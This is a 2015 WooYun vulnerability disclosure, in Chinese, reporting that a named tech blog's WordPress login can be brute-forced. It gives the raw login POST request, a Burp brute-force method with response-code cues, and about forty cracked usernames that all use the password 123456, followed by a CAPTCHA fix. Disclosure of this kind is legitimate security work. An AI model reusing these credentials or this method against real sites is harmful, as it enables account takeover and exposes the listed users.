漏洞概要 关注数(24) 关注此漏洞
缺陷编号:wooyun-2015-0161655
漏洞标题:万博科技网主站可爆破
相关厂商:万博科技网
漏洞作者: 路人甲
提交时间:2015-12-16 10:53
修复时间:2016-01-28 17:10
公开时间:2016-01-28 17:10
漏洞类型:设计缺陷/逻辑错误
危害等级:中
自评Rank:7
漏洞状态:未联系到厂商或者厂商积极忽略
漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签: 无
漏洞详情
披露状态:
2015-12-16: 积极联系厂商并且等待厂商认领中,细节不对外公开
2016-01-28: 厂商已经主动忽略漏洞,细节向公众公开
简要描述:
不算严重吧
详细说明:
地址:
http://blog.techweb.com.cn/
发送包:
POST /wp-login.php HTTP/1.1
Host: 118.186.65.243
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:42.0) Gecko/20100101 Firefox/42.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Referer: http://118.186.65.243/
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 105
log=111&pwd=123456&redirect_to=http%3A%2F%2Fblog.com%2Fwp-admin%2F&testcookie=1&wp-submit=%E7%99%BB%E5%BD%95
用户名设置变量用burp爆破
成功跳转302,失败200.
弱密码的用户多,部分证明
漏洞证明:
jake 123456
tina 123456
abcd 123456
jake 123456
suny 123456
tong 123456
troy 123456
dash 123456
tina 123456
abcd 123456
abcd 123456
aaron 123456
helen 123456
henry 123456
helen 123456
henry 123456
anson 123456
danta 123456
jesus 123456
keven 123456
aaron 123456
jesus 123456
keven 123456
sudan 123456
trade 123456
vison 123456
anson 123456
helen 123456
xujun 123456
aaron 123456
bonnie 123456
thomas 123456
xiaowu 123456
bonnie 123456
thomas 123456
thomas 123456
thomas 123456
yuanye 123456
bonnie 123456
88888888 123456
tingting 123456
修复方案:
加入验证码
版权声明:转载请注明来源 路人甲@乌云
漏洞回应
厂商回应:
未能联系到厂商或者厂商积极拒绝